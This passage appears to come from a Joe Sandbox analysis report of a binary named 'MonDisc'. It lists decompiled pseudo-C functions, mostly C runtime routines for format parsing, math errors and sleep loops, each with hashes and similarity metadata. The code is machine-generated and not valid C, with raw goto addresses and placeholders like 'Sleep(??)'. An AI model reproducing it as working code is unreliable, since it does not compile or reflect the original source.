                              				if (_t47 >= 0) goto 0x2c9d105b;
                              				E00007FF67FF62C9D0F1C(_t50, _t53);
                              				return;
                              			}








                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                              • Instruction ID: 7459ce2c7319353957be4084f52fc5ff95697936e9d656c7d1df035a8517fa8d
                              • Opcode Fuzzy Hash: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                              • Instruction Fuzzy Hash: 8A118C73E5CA8381FF643128EE9637910416F5C374E181634EA7EA62D7CE2CA8816647
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E00007FF67FF62C98EEF4(void* __ecx, void* __ebp, signed short __rbx, void* __rcx, signed short __rdi, signed short __rsi, signed short __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                              				intOrPtr _t71;
                              				signed int _t72;
                              				intOrPtr _t81;
                              				void* _t88;
                              				signed int _t93;
                              				signed int _t96;
                              				void* _t103;
                              				signed int _t108;
                              				void* _t109;
                              				signed int _t110;
                              				signed int _t111;
                              				void* _t112;
                              				intOrPtr _t125;
                              				signed short* _t145;
                              				signed short* _t146;
                              				signed short* _t148;
                              				void* _t150;
                              				void* _t152;
                              				signed int* _t165;
                              				signed short* _t169;
                              				void* _t172;
                              				void* _t173;
                              				void* _t175;
                              				void* _t178;
                              				signed int* _t179;
                              
                              				_t152 = __rcx;
                              				_t145 = _t169;
                              				_t145[4] = __rbx;
                              				_t145[8] = __rbp;
                              				_t145[0xc] = __rsi;
                              				_t145[0x10] = __rdi;
                              				_t111 = _t110 | 0xffffffff;
                              				_t150 = __rcx;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) == __rbp) goto 0x2c98f17a;
                              				if ( *((intOrPtr*)(__rcx + 0x18)) != __rbp) goto 0x2c98ef43;
                              				E00007FF67FF62C984D84(_t145);
                              				 *_t145 = 0x16;
                              				E00007FF67FF62C9C599C();
                              				goto 0x2c98f191;
                              				r12d = 0x20;
                              				 *((intOrPtr*)(_t150 + 0x478)) =  *((intOrPtr*)(_t150 + 0x478)) + 1;
                              				_t71 =  *((intOrPtr*)(_t150 + 0x478));
                              				if (_t71 == 3) goto 0x2c98f18e;
                              				if (_t71 != 2) goto 0x2c98ef77;
                              				if ( *((intOrPtr*)(_t150 + 0x47c)) == 1) goto 0x2c98f18e;
                              				_t146 =  *((intOrPtr*)(_t150 + 0x480));
                              				_t179 = _t150 + 0x34;
                              				_t165 = _t150 + 0x38;
                              				 *((intOrPtr*)(_t150 + 0x47c)) = 0;
                              				 *(_t150 + 0xde8) = _t111;
                              				 *(_t150 + 0xdec) = _t111;
                              				 *_t179 = 0;
                              				 *_t165 = 0;
                              				 *(_t150 + 0x18) = _t146;
                              				 *((intOrPtr*)(_t150 + 0x50)) = 0;
                              				 *((intOrPtr*)(_t150 + 0x2c)) = 0;
                              				_t72 =  *_t146 & 0x0000ffff;
                              				 *(_t150 + 0x42) = _t72;
                              				if (_t72 == 0) goto 0x2c98f164;
                              				 *(_t150 + 0x18) =  &(( *(_t150 + 0x18))[1]);
                              				if ( *((intOrPtr*)(_t150 + 0x28)) < 0) goto 0x2c98f169;
                              				if (( *(_t150 + 0x42) & 0xffff) - r12w - 0x5a > 0) goto 0x2c98efe4;
                              				_t147 = _t152 - 0x20;
                              				goto 0x2c98efe6;
                              				 *((intOrPtr*)(_t150 + 0x2c)) =  *((intOrPtr*)(0x2ca11bc0 + (_t152 - 0x20) * 8));
                              				if (E00007FF67FF62C99A65C( *((intOrPtr*)(0x2ca11bc0 + (_t152 - 0x20) * 8)), _t150) == 0) goto 0x2c98f18a;
                              				_t81 =  *((intOrPtr*)(_t150 + 0x2c));
                              				if (_t81 == 8) goto 0x2c98f17a;
                              				_t125 = _t81;
                              				if (_t125 == 0) goto 0x2c98f144;
                              				if (_t125 == 0) goto 0x2c98f12f;
                              				if (_t125 == 0) goto 0x2c98f0ef;
                              				if (_t125 == 0) goto 0x2c98f0ad;
                              				if (_t125 == 0) goto 0x2c98f0a6;
                              				if (_t125 == 0) goto 0x2c98f064;
                              				if (_t125 == 0) goto 0x2c98f057;
                              				if (_t81 - 0xfffffffffffffffc != 1) goto 0x2c98f18a;
                              				_t88 = E00007FF67FF62C9935E8(_t81 - 0xfffffffffffffffc, _t103, 0, _t109, _t111, _t112, 0, _t150, _t150, __rbp, _t178);
                              				goto 0x2c98f14c;
                              				E00007FF67FF62C991C34(_t88, _t103, 0, _t150, _t150, _t165);
                              				goto 0x2c98f14c;
                              				if ( *(_t150 + 0x42) == 0x2a) goto 0x2c98f07b;
                              				E00007FF67FF62C98DBB0(_t147, _t150, _t150, _t165, __rdi, _t165, _t175, _t173);
                              				goto 0x2c98f14c;
                              				if (E00007FF67FF62C99A018(_t109, _t147, _t150, _t150, _t165, _t172) == 0) goto 0x2c98f18a;
                              				if ( *((intOrPtr*)(_t150 + 0x478)) != 1) goto 0x2c98f09e;
                              				if ( *((intOrPtr*)(_t150 + 0x47c)) != 1) goto 0x2c98f150;
                              				if ( *_t165 >= 0) goto 0x2c98f0eb;
                              				 *_t165 = _t111;
                              				goto 0x2c98f0eb;
                              				 *_t165 = 0;
                              				goto 0x2c98f150;
                              				if ( *(_t150 + 0x42) == 0x2a) goto 0x2c98f0bc;
                              				goto 0x2c98f071;
                              				if (E00007FF67FF62C999B68(_t109, _t147, _t150, _t150, _t165, _t172) == 0) goto 0x2c98f18a;
                              				if ( *((intOrPtr*)(_t150 + 0x478)) != 1) goto 0x2c98f0db;
                              				if ( *((intOrPtr*)(_t150 + 0x47c)) != 1) goto 0x2c98f150;
                              				_t93 =  *_t179;
                              				if (_t93 >= 0) goto 0x2c98f0eb;
                              				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000004;
                              				 *_t179 =  ~_t93;
                              				goto 0x2c98f14c;
                              				_t96 =  *(_t150 + 0x42) & 0x0000ffff;
                              				if (_t96 == r12w) goto 0x2c98f129;
                              				if (_t96 == 0x23) goto 0x2c98f123;
                              				if (_t96 == 0x2b) goto 0x2c98f11d;
                              				if (_t96 == 0x2d) goto 0x2c98f117;
                              				if (_t96 != 0x30) goto 0x2c98f150;
                              				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000008;
                              				goto 0x2c98f150;
                              				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000004;
                              				goto 0x2c98f150;
                              				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000001;
                              				goto 0x2c98f150;
                              				 *(_t150 + 0x30) =  *(_t150 + 0x30) | r12d;
                              				goto 0x2c98f150;
                              				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000002;
                              				goto 0x2c98f150;
                              				 *_t179 = 0;
                              				 *((intOrPtr*)(_t150 + 0x40)) = bpl;
                              				 *(_t150 + 0x30) = 0;
                              				 *_t165 = _t111;
                              				 *((intOrPtr*)(_t150 + 0x3c)) = 0;
                              				 *((intOrPtr*)(_t150 + 0x54)) = bpl;
                              				goto 0x2c98f150;
                              				E00007FF67FF62C990430(_t109, _t150);
                              				if (1 == 0) goto 0x2c98f18a;
                              				_t148 =  *(_t150 + 0x18);
                              				_t108 =  *_t148 & 0x0000ffff;
                              				 *(_t150 + 0x42) = _t108;
                              				if (_t108 != 0) goto 0x2c98efb7;
                              				 *(_t150 + 0x18) =  &(( *(_t150 + 0x18))[1]);
                              				if (E00007FF67FF62C99AA7C(_t148, _t150) == 0) goto 0x2c98f18a;
                              				goto 0x2c98ef50;
                              				E00007FF67FF62C984D84(_t148);
                              				 *_t148 = 0x16;
                              				E00007FF67FF62C9C599C();
                              				goto 0x2c98f191;
                              				return  *((intOrPtr*)(_t150 + 0x28));
                              			}





























                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: $*
                              • API String ID: 3215553584-3982473090
                              • Opcode ID: 4ec63f425f504d4985957b1cdca87beaadbf0596afe588d0148998f90385a7bc
                              • Instruction ID: 3b4b2037375902518b116183210ab80c1cdc5c7cb189c0ef7cce0ea0db0534cd
                              • Opcode Fuzzy Hash: 4ec63f425f504d4985957b1cdca87beaadbf0596afe588d0148998f90385a7bc
                              • Instruction Fuzzy Hash: D881AF72D18202CAEF649F25C844A7C37A4EB05BA8F546235CA4DC739ADF3EE541CB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00007FF67FF62C98E108(intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                              				signed int _t11;
                              
                              				_a8 = __rbx;
                              				_a16 = __rbp;
                              				_a24 = __rsi;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) != 0) goto 0x2c98e15f;
                              				E00007FF67FF62C984D84(__rax);
                              				 *__rax = 0x16;
                              				E00007FF67FF62C9C599C();
                              				return _t11 | 0xffffffff;
                              			}





                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: $*
                              • API String ID: 3215553584-3982473090
                              • Opcode ID: 1e5db448f25c8a98aa9a74eb4f8bf21431e05364ea239c8b4b33d55978b68cba
                              • Instruction ID: 5ad8be3901c596657a861832007016cdb9c9c343930e9a8b6b4befdaed1da821
                              • Opcode Fuzzy Hash: 1e5db448f25c8a98aa9a74eb4f8bf21431e05364ea239c8b4b33d55978b68cba
                              • Instruction Fuzzy Hash: 5F816476C0C2C68AEF648F25886457C37A9EB16BA8F140236CB49C7797DE39E941C707
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: "$sinh
                              • API String ID: 1156100317-1232919748
                              • Opcode ID: 36117724d7e1ed04c3f67e70320efff5a7a109e9a1e26f1d85601939faa17356
                              • Instruction ID: 96863ef2efd592e5810dae0e48bf683f333171caa9206e294a9473258f34ed97
                              • Opcode Fuzzy Hash: 36117724d7e1ed04c3f67e70320efff5a7a109e9a1e26f1d85601939faa17356
                              • Instruction Fuzzy Hash: 1B919822D28F8588DA63CB34B8513B57358AF663E5F519333E58E71A66DF6CE0838701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: !$acos
                              • API String ID: 1156100317-2870037509
                              • Opcode ID: b6dcec823e4dc5a9c417182350a053a95c54a451be3991cdf5f5124268749f73
                              • Instruction ID: 200d9f966abe40536c337745dca57c5106090a6eb0e15dd5b1ea0ad545c30246
                              • Opcode Fuzzy Hash: b6dcec823e4dc5a9c417182350a053a95c54a451be3991cdf5f5124268749f73
                              • Instruction Fuzzy Hash: 3361B721D2CF4989EA23CB38BC503769754BF663E0F128336E95EB5D65DF2CE0824601
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: !$asin
                              • API String ID: 1156100317-2188059690
                              • Opcode ID: 1ef3dec4585e277179b23e00cc37b891c191b52d688dbad3f81acd93394b27a0
                              • Instruction ID: 99aa8e7254daaaefcacb49d2c4481878b589376aeb11b3cec5154c9c244d9a47
                              • Opcode Fuzzy Hash: 1ef3dec4585e277179b23e00cc37b891c191b52d688dbad3f81acd93394b27a0
                              • Instruction Fuzzy Hash: 7261A821D2CF4989EA13CB38BC51376A354BF963E0F118336E95EB5A65DF2CA0828701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			E00007FF67FF62C916910(void* __edx, void* __rax, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __r14) {
                              				intOrPtr _t37;
                              				signed char _t41;
                              				intOrPtr _t61;
                              				long _t63;
                              				long long _t65;
                              				void* _t67;
                              				void* _t68;
                              				void* _t70;
                              				void* _t71;
                              				void* _t74;
                              
                              				 *((long long*)(_t67 + 0x20)) = __rbx;
                              				_t68 = _t67 - 0x20;
                              				 *((intOrPtr*)(__rcx + 0x50))();
                              				Sleep(_t63);
                              				if ( *((intOrPtr*)(__rcx + 0x90)) != 0) goto 0x2c9169db;
                              				 *((long long*)(_t68 + 0x30)) = _t65;
                              				 *((long long*)(_t68 + 0x38)) = __rdi;
                              				 *((long long*)(_t68 + 0x40)) = __r14;
                              				r14d = 0x47;
                              				_t61 =  *__rcx;
                              				E00007FF67FF62C9EE0B0();
                              				 *((intOrPtr*)(__rcx + 0x3c)) =  *((intOrPtr*)(__rcx + 0x3c)) + 1;
                              				_t41 =  *(_t61 + 0x91) & 0x000000ff;
                              				if ((_t41 & 0x000000e0) != 0) goto 0x2c9169b1;
                              				_t37 =  *((intOrPtr*)(_t61 + 0xb8));
                              				if (_t37 < 0) goto 0x2c91697d;
                              				goto 0x2c91699d;
                              				if (_t37 != 0xffffffff) goto 0x2c916987;
                              				goto 0x2c91699d;
                              				if (_t37 != 0xfffffffe) goto 0x2c916991;
                              				goto 0x2c91699d;
                              				_t31 =  ==  ? r14d : 0x4a;
                              				 *((intOrPtr*)(__rcx + 0x40)) = 0x4a;
                              				 *(_t61 + 0x91) = _t41 | 0x00000080;
                              				E00007FF67FF62C8FFCF0( ==  ? r14d : 0x4a, _t37, _t41 | 0x00000080, __rcx, _t61, _t61, _t65, _t70, _t71, __r14, _t74);
                              				E00007FF67FF62C9EE0B8();
                              				Sleep(??);
                              				if ( *((intOrPtr*)(__rcx + 0x90)) == 0) goto 0x2c916950;
                              				 *((intOrPtr*)(__rcx + 0x58))();
                              				return 0;
                              			}














                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Sleep$AcquireCriticalLeaveLockSection
                              • String ID:
                              • API String ID: 1711459333-0
                              • Opcode ID: 8bff635730d18e62b8c5ba54141f2cfb47b45429cdf546357ab3a6131a260e01
                              • Instruction ID: 09a5473a5e9af49e8af6a2d4ca76c840cd3dd0b496ef0919275007a0719e2926
                              • Opcode Fuzzy Hash: 8bff635730d18e62b8c5ba54141f2cfb47b45429cdf546357ab3a6131a260e01
                              • Instruction Fuzzy Hash: 95217F32E0CA8187DB588F28988137C7365FB45B75F141235EA6E826D9CF7CE945CB02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLastVirtual$FreeQuery
                              • String ID:
                              • API String ID: 2187276999-0
                              • Opcode ID: b3dfd8fdebdf336bd3649c607cabc9316637ede27637d673395c608ceccb4a5d
                              • Instruction ID: bc53e9b13fdaa83b3c713f87617b3435433ebed20d3bda400750e55eb9a20c30
                              • Opcode Fuzzy Hash: b3dfd8fdebdf336bd3649c607cabc9316637ede27637d673395c608ceccb4a5d
                              • Instruction Fuzzy Hash: D8117B31F0CB81C2FF618B19B80512966B5FB48BE0F484135E65D92B99DF7CD5908701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			E00007FF67FF62C98DEE4(void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, void* __rbp, long long _a8, long long _a16) {
                              				void* _t75;
                              				void* _t89;
                              				void* _t95;
                              				signed int _t98;
                              				signed int _t105;
                              				signed int _t107;
                              				char _t109;
                              				void* _t110;
                              				signed int _t111;
                              				signed int _t112;
                              				void* _t113;
                              				signed int _t121;
                              				intOrPtr* _t137;
                              				intOrPtr* _t141;
                              				void* _t143;
                              				char _t151;
                              				void* _t156;
                              
                              				_t157 = __rbp;
                              				_t137 = __rax;
                              				_t110 = __edx;
                              				_a8 = __rbx;
                              				_a16 = __rdi;
                              				_t143 = __rcx;
                              				_t112 = _t111 | 0xffffffff;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) == 0) goto 0x2c98e0e3;
                              				if (E00007FF67FF62C99AE4C(_t75,  *((intOrPtr*)(__rcx + 0x468))) == 0) goto 0x2c98e0f3;
                              				if ( *((long long*)(__rcx + 0x18)) != 0) goto 0x2c98df35;
                              				E00007FF67FF62C984D84(_t137);
                              				 *_t137 = 0x16;
                              				E00007FF67FF62C9C599C();
                              				goto 0x2c98e0f5;
                              				 *((intOrPtr*)(_t143 + 0x470)) =  *((intOrPtr*)(_t143 + 0x470)) + 1;
                              				if ( *((intOrPtr*)(_t143 + 0x470)) == 2) goto 0x2c98e0de;
                              				 *(_t143 + 0x50) =  *(_t143 + 0x50) & 0x00000000;
                              				 *(_t143 + 0x2c) =  *(_t143 + 0x2c) & 0x00000000;
                              				goto 0x2c98e0aa;
                              				 *((long long*)(_t143 + 0x18)) =  *((long long*)(_t143 + 0x18)) + 1;
                              				if ( *((intOrPtr*)(_t143 + 0x28)) < 0) goto 0x2c98e0bf;
                              				_t151 =  *((char*)(_t143 + 0x41));
                              				if (_t151 - 0x20 - 0x5a > 0) goto 0x2c98df84;
                              				_t138 = _t151 - 0x20;
                              				goto 0x2c98df86;
                              				_t98 =  *(0x2ca11bc0 + (_t151 - 0x20) * 8);
                              				 *(_t143 + 0x2c) = _t98;
                              				if (_t98 == 8) goto 0x2c98e0e3;
                              				_t121 = _t98;
                              				if (_t121 == 0) goto 0x2c98e09e;
                              				if (_t121 == 0) goto 0x2c98e085;
                              				if (_t121 == 0) goto 0x2c98e050;
                              				if (_t121 == 0) goto 0x2c98e025;
                              				if (_t121 == 0) goto 0x2c98e01c;
                              				if (_t121 == 0) goto 0x2c98dff0;
                              				if (_t121 == 0) goto 0x2c98dfe3;
                              				if (_t98 - 0xfffffffffffffffc != 1) goto 0x2c98e0f3;
                              				E00007FF67FF62C992418(_t98 - 0xfffffffffffffffc, __edx, _t112, _t113, _t151 - 0x20, _t143, _t143, _t156, __rbp);
                              				goto 0x2c98e0a6;
                              				E00007FF67FF62C991200(_t95, _t98 - 0xfffffffffffffffc, _t151 - 0x20, _t143);
                              				goto 0x2c98e0a6;
                              				if (_t110 == 0x2a) goto 0x2c98e006;
                              				E00007FF67FF62C98D734(_t138, _t143, _t143, _t143 + 0x38, _t157);
                              				goto 0x2c98e0a6;
                              				 *((long long*)(_t143 + 0x20)) =  *((long long*)(_t143 + 0x20)) + 8;
                              				_t105 =  *( *((intOrPtr*)(_t143 + 0x20)) - 8);
                              				_t106 =  <  ? _t112 : _t105;
                              				 *(_t143 + 0x38) =  <  ? _t112 : _t105;
                              				goto 0x2c98e04c;
                              				 *(_t143 + 0x38) =  *(_t143 + 0x38) & 0x00000000;
                              				goto 0x2c98e0aa;
                              				if (_t110 == 0x2a) goto 0x2c98e030;
                              				goto 0x2c98dff9;
                              				 *((long long*)(_t143 + 0x20)) =  *((long long*)(_t143 + 0x20)) + 8;
                              				_t107 =  *( *((intOrPtr*)(_t143 + 0x20)) - 8);
                              				 *(_t143 + 0x34) = _t107;
                              				if (_t107 >= 0) goto 0x2c98e04c;
                              				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000004;
                              				 *(_t143 + 0x34) =  ~_t107;
                              				goto 0x2c98e0a6;
                              				_t89 = _t110;
                              				if (_t110 == 0x20) goto 0x2c98e07f;
                              				if (_t89 == 0x23) goto 0x2c98e079;
                              				if (_t89 == 0x2b) goto 0x2c98e073;
                              				if (_t89 == 0x2d) goto 0x2c98e06d;
                              				if (_t89 != 0x30) goto 0x2c98e0aa;
                              				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000008;
                              				goto 0x2c98e0aa;
                              				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000004;
                              				goto 0x2c98e0aa;
                              				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000001;
                              				goto 0x2c98e0aa;
                              				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000020;
                              				goto 0x2c98e0aa;
                              				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000002;
                              				goto 0x2c98e0aa;
                              				 *(_t143 + 0x34) =  *(_t143 + 0x34) & 0x00000000;
                              				 *(_t143 + 0x30) =  *(_t143 + 0x30) & 0x00000000;
                              				 *(_t143 + 0x3c) =  *(_t143 + 0x3c) & 0x00000000;
                              				 *((char*)(_t143 + 0x40)) = 0;
                              				 *(_t143 + 0x38) = _t112;
                              				 *((char*)(_t143 + 0x54)) = 0;
                              				goto 0x2c98e0aa;
                              				if (E00007FF67FF62C9900E4( ~_t107, _t143) == 0) goto 0x2c98e0f3;
                              				_t141 =  *((intOrPtr*)(_t143 + 0x18));
                              				_t109 =  *_t141;
                              				 *((char*)(_t143 + 0x41)) = _t109;
                              				if (_t109 != 0) goto 0x2c98df5c;
                              				 *((long long*)(_t143 + 0x18)) =  *((long long*)(_t143 + 0x18)) + 1;
                              				if ( *(_t143 + 0x2c) == 0) goto 0x2c98e0cb;
                              				if ( *(_t143 + 0x2c) != 7) goto 0x2c98e0e3;
                              				 *((intOrPtr*)(_t143 + 0x470)) =  *((intOrPtr*)(_t143 + 0x470)) + 1;
                              				if ( *((intOrPtr*)(_t143 + 0x470)) != 2) goto 0x2c98df4f;
                              				goto 0x2c98e0f5;
                              				E00007FF67FF62C984D84(_t141);
                              				 *_t141 = 0x16;
                              				E00007FF67FF62C9C599C();
                              				return _t112;
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: b6a25df9840ecf1653155f71c6feae910b6b73a21f0a4fc9273019de221468bb
                              • Instruction ID: b5030537f341d675d62111747b55861762c68033ddbab1c7a29fc8ed59e8db36
                              • Opcode Fuzzy Hash: b6a25df9840ecf1653155f71c6feae910b6b73a21f0a4fc9273019de221468bb
                              • Instruction Fuzzy Hash: 58618577D1C286C6EF688F288864B7C37A9EB15BA8F141735C60A872DACF2DD441C603
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 65%
                              			E00007FF67FF62C98E5C0(void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, signed int __rsi, void* __rbp, long long _a8, long long _a16, long long _a24) {
                              				void* _t82;
                              				void* _t85;
                              				intOrPtr _t88;
                              				signed int _t95;
                              				signed int _t97;
                              				char _t99;
                              				void* _t100;
                              				signed int _t101;
                              				signed int _t102;
                              				intOrPtr _t110;
                              				void* _t132;
                              				void* _t134;
                              				char _t139;
                              				signed int _t144;
                              
                              				_t146 = __rbp;
                              				_t144 = __rsi;
                              				_t134 = __rcx;
                              				_t100 = __edx;
                              				_a8 = __rbx;
                              				_a16 = __rsi;
                              				_a24 = __rdi;
                              				_t102 = _t101 | 0xffffffff;
                              				_t132 = __rcx;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) == __rsi) goto 0x2c98e7bf;
                              				if ( *((intOrPtr*)(__rcx + 0x18)) != __rsi) goto 0x2c98e607;
                              				E00007FF67FF62C984D84(__rax);
                              				 *__rax = 0x16;
                              				E00007FF67FF62C9C599C();
                              				goto 0x2c98e7a9;
                              				 *((intOrPtr*)(_t134 + 0x470)) =  *((intOrPtr*)(_t134 + 0x470)) + 1;
                              				if ( *((intOrPtr*)(_t134 + 0x470)) == 2) goto 0x2c98e7a6;
                              				 *((intOrPtr*)(_t132 + 0x50)) = 0;
                              				 *((intOrPtr*)(_t132 + 0x2c)) = 0;
                              				goto 0x2c98e773;
                              				 *((long long*)(_t132 + 0x18)) =  *((long long*)(_t132 + 0x18)) + 1;
                              				if ( *((intOrPtr*)(_t132 + 0x28)) < 0) goto 0x2c98e788;
                              				_t139 =  *((char*)(_t132 + 0x41));
                              				if (_t139 - 0x20 - 0x5a > 0) goto 0x2c98e653;
                              				_t127 = _t139 - 0x20;
                              				goto 0x2c98e655;
                              				_t88 =  *((intOrPtr*)(0x2ca11bc0 + (_t139 - 0x20) * 8));
                              				 *((intOrPtr*)(_t132 + 0x2c)) = _t88;
                              				if (_t88 == 8) goto 0x2c98e7bf;
                              				_t110 = _t88;
                              				if (_t110 == 0) goto 0x2c98e767;
                              				if (_t110 == 0) goto 0x2c98e753;
                              				if (_t110 == 0) goto 0x2c98e71e;
                              				if (_t110 == 0) goto 0x2c98e6f3;
                              				if (_t110 == 0) goto 0x2c98e6eb;
                              				if (_t110 == 0) goto 0x2c98e6bf;
                              				if (_t110 == 0) goto 0x2c98e6b2;
                              				if (_t88 - 0xfffffffffffffffc != 1) goto 0x2c98e7cf;
                              				E00007FF67FF62C992BBC(_t85, _t88 - 0xfffffffffffffffc, __edx, _t102, 0, _t139 - 0x20, _t132, _t132, __rsi, __rbp);
                              				goto 0x2c98e76f;
                              				E00007FF67FF62C991650(_t85, _t88 - 0xfffffffffffffffc, _t139 - 0x20, _t132);
                              				goto 0x2c98e76f;
                              				if (_t100 == 0x2a) goto 0x2c98e6d5;
                              				E00007FF67FF62C98D920(_t127, _t132, _t132, _t132 + 0x38, _t146);
                              				goto 0x2c98e76f;
                              				 *((long long*)(_t132 + 0x20)) =  *((long long*)(_t132 + 0x20)) + 8;
                              				_t95 =  *( *((intOrPtr*)(_t132 + 0x20)) - 8);
                              				_t96 =  <  ? _t102 : _t95;
                              				 *(_t132 + 0x38) =  <  ? _t102 : _t95;
                              				goto 0x2c98e71a;
                              				 *(_t132 + 0x38) = 0;
                              				goto 0x2c98e773;
                              				if (_t100 == 0x2a) goto 0x2c98e6fe;
                              				goto 0x2c98e6c8;
